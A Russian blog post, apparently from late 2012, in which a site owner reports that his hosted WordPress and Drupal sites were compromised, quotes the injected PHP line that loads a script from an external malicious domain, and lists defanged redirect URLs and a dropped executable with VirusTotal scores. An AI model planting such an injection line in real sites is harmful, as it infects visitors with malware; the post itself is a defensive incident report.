Allex (all_x) wrote,
Allex
all_x

Вирусы на сайтах хостинг-центра

ПО ССЫЛКАМ НЕ ХОДИТЬ, УБЬЁТ!

Все мои сайты, хостящиеся у Хостинг-центра взломаны однотипным способом:
26.12.12 15:49 в файл index.php корневого каталога добавлена строка
echo '<script src="хттп:\\kinoshkaxa.changeip.name\rsize.js"></script>';
Используется wordpress разных версий и drupal. Не думаю, что взлом можно объяснить уязвимостью этих CMS. Также сомневаюсь, что к такому могла привести утечка паролей – вряд ли все файлы были модифицированы в одну и ту же секунду. Так что скорее всего взломан сервер и злоумышленник получил root-доступ. В прошлый раз в аналогичной ситуации хостинг-центр перевел стрелки на меня – мол, не уберег пароли. Не верю. Написал им, посмотрю, что ответят.

Кстати, неделю назад сам чуть не подхватил вирус с зараженного таким образом сайта. И ладно бы порнуху пошёл смотреть – искал кое-что по 1С. Хотя коллеги говорят, что это и есть порнуха. Сайт тот до сих пор заражен – 1czone.ru, хотя я им отписал в тот же день. А ещё отписал про этот сайт гуглу и яндексу – никто его как зараженный не помечает до сих пор.

Так что спасение утопающих – дело рук самих утопающих. Пришлось латать дыры в браузере. Расширение NoScript меня не устраивает, уж очень много рубит. В результате нашёл замечательное расширение для Firefox – RequestPolicy, которое позволяет контролировать межсайтовые запросы. Настоятельно рекомендую.

С наступающим Новым годом!

P.S. Скрипт перенаправляет дальше:
хттп:\\gmokcne.gr8name.biz\advjump\2
хттп:\\jqgmjci.ddns.me.uk:5816\milk\largest_wondering_buys.php
Результаты анализа VirusTotal: largest_wondering_buys.php (сейчас уже 12/46, а было 4/46).
Пытался установить мне wgsdgsdgdsgsd.exe (сейчас уже 27/45, было 11)
Сами файлы могу выслать желающим поковыряться.

P.S. Заменил http:// на хттп:\\, а то яндекс считает, что на сайте вредоносный код.


Из блога софт, хард & интERнет
Tags: Интернет
Subscribe
  • Post a new comment

    Error

    Anonymous comments are disabled in this journal

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

  • 0 comments